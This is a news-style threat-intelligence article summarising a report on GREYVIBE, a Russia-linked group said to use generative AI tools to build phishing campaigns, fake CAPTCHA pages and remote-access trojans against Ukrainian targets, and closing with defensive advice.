Threat actors are increasingly harnessing generative AI tools such as ChatGPT and Google Gemini to enhance their cyberattack operations. This shift is significantly lowering technical barriers and reshaping contemporary threat landscapes, as evidence mounts about the strategic integration of these advanced technologies into cybercriminal activities.
A recent report published by WithSecure has brought attention to a particular Russia-linked threat group known as GREYVIBE. This group has been systematically utilizing large language models (LLMs) in its campaigns targeting Ukraine and related entities since August 2025. As the geopolitical climate continues to evolve, GREYVIBE’s activities signal a concerning trend where sophisticated AI tools are not just the domain of security researchers but are also being used by malicious actors to conduct cyber warfare.
### The Mechanics of Cyberattack Operations
GREYVIBE has demonstrated a wide array of multi-vector attacks that include spear-phishing, the creation of fake CAPTCHA verification pages, and the establishment of malicious websites aimed at distributing malware. These tactics show an alarming sophistication and adaptability in their operational strategies.
One notable aspect of GREYVIBE’s approach is its phishing campaigns, branded as PhantomMail. These campaigns employ malicious archive files hosted on popular cloud storage services like Google Drive. Victims are duped into executing loaders disguised as legitimate documents, resulting in compromised systems. The clever utilization of socially-engineered tactics illustrates a deep understanding of human psychology and trust.
Another operation by GREYVIBE, dubbed PhantomClick, cleverly deploys fake CAPTCHA pages designed to resemble those of legitimate platforms such as Zoom. These impersonations aim to manipulate unsuspecting users into executing harmful commands, further underlining the group’s exploitation of social engineering.
In addition to these campaigns, GREYVIBE has launched PrincessClub operations, where fake adult-themed websites are used to entice victims, particularly Ukrainian military personnel, into downloading spyware and remote access tools. This tactic exemplifies the group’s ability to target vulnerable populations and utilize topical lures for malicious gain.
The report highlights that GREYVIBE extensively integrates AI tools, including ChatGPT, Google Gemini, and Ideogram AI, throughout the entire lifecycle of their attacks. This operational synergy allows the group to generate compelling phishing lures, construct malicious websites, develop obfuscated scripts, and even assist in malware creation. The implications of such automation are profound, enabling rapid development and modification of attack infrastructures while minimizing dependence on traditional malware patterns that defenders may find easier to identify.
### Tools and Techniques in Use
One significant innovation attributed to GREYVIBE is LegionRelay, a custom PowerShell-based remote access trojan (RAT) that researchers believe may have been partially developed with AI assistance. Despite its relatively simplistic architecture, LegionRelay is equipped with functionalities that allow attackers to execute commands, exfiltrate files, capture screenshots, and harvest sensitive data from applications like Telegram and WhatsApp. Critically, researchers have identified design flaws within LegionRelay that reveal portions of its backend infrastructure, thereby providing deeper insights into GREYVIBE’s operational tactics.
In addition to LegionRelay, GREYVIBE employs PhantomRelay, another RAT distinguished by its use of WebSocket communication and modular scripting capabilities enhanced post-compromise. For mobile platforms, the group exploits FallSpy, an Android spyware capable of collecting contacts, call logs, location data, and device information. Such advancements are supported by custom obfuscators like DAYLIGHT and TEASOUP, designed to evade detection and thwart analysis.
AI plays a pivotal role in enabling GREYVIBE to efficiently scale its operations. By automating coding tasks, generating convincing social engineering content, and assisting in infrastructure setup, these technologies significantly reduce the skill threshold typically required for advanced cyber operations. This capability not only accelerates their activities but also complicates the attribution of cyber incidents. AI-generated artifacts can vary considerably across different campaigns, undermining traditional detection methods that rely on identifying code reuse and recognizing behavioral patterns.
### Conclusion and Implications
Although GREYVIBE operates in alignment with Russian state interests—particularly in intelligence gathering related to the ongoing conflict in Ukraine—the group exhibits traits indicative of both state-sponsored and cybercriminal endeavors. Evidence suggests that GREYVIBE operates within the Moscow time zone, communicates in Russian, and may maintain connections with known cybercrime ecosystems, such as those linked to TrickBot clusters. This duality between state-sponsored initiatives and organized cybercrime further complicates the landscape of modern cybersecurity.
The rise of AI-assisted groups like GREYVIBE signals a transformative shift in the arena of cyber warfare, where automation and generative technologies enhance the speed and adaptability of cyber threats. For defenders, this evolving landscape presents numerous challenges. As cyber attackers grow more adept at iterating their tactics to evade detection, organizations must bolster their defenses by strengthening email filtering systems, monitoring for unusual command executions, and adopting behavior-based detection methodologies to counter increasingly sophisticated, AI-driven threats. The urgency to adapt becomes paramount as the stakes in this digital battleground continue to rise.